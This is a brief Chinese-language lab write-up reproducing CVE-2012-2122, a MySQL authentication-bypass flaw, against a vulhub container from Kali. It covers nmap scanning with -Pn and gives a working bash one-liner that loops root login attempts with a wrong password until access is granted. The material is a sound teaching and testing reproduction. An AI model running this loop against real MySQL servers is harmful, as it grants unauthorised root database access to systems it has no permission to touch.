1.原理
参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客
简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入
使用:kali+vulhub
2.复现
开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的
用ifconfig查一下受攻击机的ip地址
址查一下端口,看看是否正常打开了,发现有3306
用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到
for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)
最后记得停止使用容器防止后续其他容器的打开
docker ps 展示所有正在使用的容器
docker stop +容器的id 关闭容器